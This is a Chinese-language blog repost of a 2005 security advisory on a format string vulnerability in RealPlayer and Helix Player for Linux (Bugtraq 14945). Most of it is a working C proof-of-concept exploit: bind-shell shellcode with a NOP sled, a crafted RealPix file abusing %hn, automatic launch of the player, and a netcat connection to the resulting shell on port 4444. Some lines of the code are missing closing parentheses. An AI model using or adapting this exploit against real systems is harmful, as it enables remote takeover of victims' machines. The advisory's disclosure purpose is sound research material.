RealNetworks RealPlayer和Helix Player格式串处理漏洞- -
Tag: RealNetworks RealPlayer和Heli Player格式串处理漏洞RealNetworks RealPlayer和Helix Player格式串处理漏洞
发布日期:2005-09-27
更新日期:2005-09-27
受影响系统:
Real Networks RealPlayer 10 Japanese
Real Networks RealPlayer 10 German
Real Networks RealPlayer 10 for Linux
Real Networks RealPlayer 10 English
Real Networks Helix Player for Linux 1.0.4
Real Networks Helix Player for Linux 1.0.3
Real Networks Helix Player for Linux 1.0.2
Real Networks Helix Player for Linux 1.0.1
Real Networks Helix Player for Linux 1.0
Real Networks RealPlayer For Unix 10.0.4
Real Networks RealPlayer For Unix 10.0.3描述:
BUGTRAQ ID: 14945
RealPlayer和Helix Player都是非常流行的媒体播放器,支持多种媒体格式。
RealPlayer和Helix Player中存在格式串漏洞,远程攻击者可能利用此漏洞控制机器。
起因是没有正确的验证用户输入。远程攻击者可以利用这个漏洞直接向格式化打印函数提供格式说明符,导致执行任意代码。
<*来源:c0ntex (c0ntex@hushmail.com)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFFER 10000
#define EBPMSB 64105
#define HOST "localhost"
#define NETCAT "/bin/nc"
#define NOPS 0x90
#define STACKPOP 148
#define VULN "/usr/local/RealPlayer/realplay"
char filename[]="\x56\x59\x14\x82\x26\x08\x2e\x72\x70";
/* metasploit port binding shellcode = 4444 */
char hellcode[]="\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66"
"\x58\x99\x89\xe1\xcd\x80\x96\x43\x52"
"\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a"
"\x66\x58\x50\x51\x56\x89\xe1\xcd\x80"
"\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56"
"\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a"
"\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9"
"\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
"\xe1\xcd\x80";
int
filegen(char *shellcode)
{
FILE *rp;
printf("[-] Creating file [%s]\n", filename);
rp = fopen(filename, "w"
;
if(!rp) {
puts("[!] Could not fopen file!";
free(shellcode);
return(EXIT_FAILURE);
}
printf("[-] Using [%d] stack pops\n[-] Modifying EBP MSB with value [%d]\n", STACKPOP, EBPMSB);
fprintf(rp,
"<imfl>\n"
"<head\n"
"duration=\"1:33.7\"\n"
"timeformat=\"dd:hh:mm:ss.xyz\"\n"
"preroll=\"1:33.7\"\n"
"bitrate=\"1337\"\n"
"width=\"69\"\n"
"height=\"69\"\n"
"aspect=\"\"\n"
"url=\"http://www.open-security.org\"/>\n"
"<image handle=\"%%.%du%%%d$hn\" name=\"findme%s\"/>\n"
"<fadein start=\"0\" duration=\"0:01\" target=\"2\"/>\n"
"</imfl>", EBPMSB, STACKPOP, shellcode);
fclose(rp);
free(shellcode); shellcode = NULL;
return(EXIT_SUCCESS);
}
int
main(int argc, char **argv)
{
char *shellcode = NULL;
puts("\nRemote format string exploit POC for UNIX RealPlayer && HelixPlayer";
puts("Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version";
puts("by c0ntex || c0ntexb@gmail.com || http://www.open-security.org\n";
shellcode = (char *)malloc(BUFFER);
if(!shellcode) {
puts("[!] Could not malloc";
return(EXIT_FAILURE);
}
memset(shellcode, NOPS, BUFFER);
memcpy(&shellcode[BUFFER-strlen(hellcode)], hellcode, strlen(hellcode));
shellcode[BUFFER] = '\0';
filegen(shellcode);
puts("[-] Completed creation of test file!\n[-] Executing RealPlayer now...";
switch(fork()) {
case -1:
puts("[!] Could not fork off, bailing!";
return(EXIT_FAILURE);
case 0:
if(execl(VULN, "realplay", filename, NULL) <0) {
puts("[!] Could not execute realplayer... 
";
return(EXIT_FAILURE);
}
}
puts("[-] Connecting to shell in 10 seconds\n** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW **";
sleep(10);
if(execl(NETCAT, "nc", HOST, "4444", NULL) <0) {
puts("[!] Could not connect, check the core file!";
return(EXIT_FAILURE);
}
return(EXIT_SUCCESS);
}
建议:
厂商补丁:
Real Networks
Trackback
你可以使用这个链接引用该篇文章 http://publishblog.blogchina.com/blog/tb.b?diaryID=3139808
博客手拉手
[2005-10-02 03:52:24.0] RealNetworks RealPlayer和Helix Player格式串处理漏洞
[2005-07-19 00:00:00.0] WinZip被收购
[2005-07-04 00:00:00.0] 网络世界的“后门”-端口的故事⑨
[2005-08-05 00:00:00.0] Helix Universal Server部分POST请求远程DoS漏洞
[2005-07-29 00:00:00.0] 无太多利润:WinZip近日被收购!